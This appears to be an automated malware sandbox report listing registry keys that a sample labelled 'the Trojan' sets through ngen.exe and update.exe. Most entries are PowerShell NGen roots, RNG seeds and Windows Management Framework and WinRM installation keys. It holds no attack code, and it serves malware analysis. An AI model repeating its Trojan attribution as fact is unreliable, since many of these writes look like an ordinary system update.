The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B 00 9B 0E BD 3B 09 33 6D E8 34 6B 6D AE 2A 21"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:2960 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 CF 1E 12 B5 E7 8E 2B BC B9 F2 E1 E1 13 84 AE"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"
The process ngen.exe:1816 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 2B 36 19 87 6F 64 FD F6 BF DD 02 0A 06 1D A7"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
The process ngen.exe:2520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 B0 B8 7D BA A5 48 DD 39 82 CE D9 06 C1 62 97"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
The process ngen.exe:2484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 9E DD 11 73 22 B4 F8 08 C4 14 9F 1D 3C DC EE"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:2980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 23 80 D7 46 F9 9C D5 F8 A9 2B 36 73 95 B0 31"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
The process ngen.exe:2348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 32 A8 92 F8 86 CF 87 41 81 6A AF A9 E0 35 43"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
The process ngen.exe:3020 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 3B 6D 2B 2F 50 F5 35 0A 49 EC 16 7B 73 37 C9"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:2500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "84 B8 28 A0 B3 78 C8 38 0D 64 B0 C9 67 64 2B 38"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process ngen.exe:2444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 31 71 92 30 02 F7 29 02 C7 C8 CB 3C 0D 5A C9"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process ngen.exe:2580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 26 EC A6 C8 55 51 3F B0 38 E9 78 71 75 EC 62"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
The process ngen.exe:224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 86 C3 A9 2B DC C1 9C AF D8 32 06 87 D0 E2 E3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:784 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 E7 58 8D BB BD 9D 56 A4 5E 5A D3 77 FC CD C7"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"
The process ngen.exe:2992 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 76 5C 55 08 39 9A 83 84 CE 77 5F EB 98 AE 5E"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process ngen.exe:2492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 58 7C 49 48 55 9F 83 0C 06 86 BA AE 72 60 00"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:2412 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 26 8A A2 0D 13 99 39 09 12 F0 A1 8C 62 5B 58"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"
The process ngen.exe:2372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 DE B5 50 4F 2D F3 B6 4A 98 9B 6D 78 C7 98 33"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process ngen.exe:2532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 E4 2A B0 97 DA 8A 28 9B 39 ED F3 CB CE FE 84"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
The process ngen.exe:2512 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A FA DF 1F C5 C4 08 79 BE CF C8 D1 CA D1 75 75"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process update.exe:2828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Description" = "Windows Management Framework Core"
[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"StackVersion" = "2.0"
[HKCR\Microsoft.PowerShellModule.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"ControlFlags" = "1"
[HKCR\.psc1]
"(Default)" = "Microsoft.PowerShellConsole.1"
[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "IWSManHostEntrySink"
[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsGetSignature"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PSCompatibleVersion" = "1.0,2.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoModify" = "1"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"(Default)" = "Microsoft Windows WSMan Provider Host"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"TypesSupported" = "7"
[HKCR\Microsoft.PowerShellModule.1]
"EditFlags" = "131072"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\b0c:111dc8\iis]
"PathInetsrv" = "%System%\inetsrv"
[HKCR\WSMan.InternalAutomation\CurVer]
"(Default)" = "WSMan.InternalAutomation.1"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}]
"(Default)" = "IWSManResourceLocator"
[HKCR\.ps1xml]
"PerceivedType" = "Text"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}]
"(Default)" = "IWSManConnectionOptions"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryCount" = "8"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\FLAGS]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"LogLevel" = "536870912"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKCR\Microsoft.PowerShellScript.1]
"EditFlags" = "131072"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"WINRM" = "WINRM"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"file" = "%WinDir%\System32\config\WindowsPowerShell.evt"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKCR\Microsoft.PowerShellScript.1\shell\Run with PowerShell\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -file %1"
[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"EventMessageFile" = "%systemroot%\system32\WsmRes.dll"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"ServerExecutable" = "%System%\wsmprovhost.exe"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
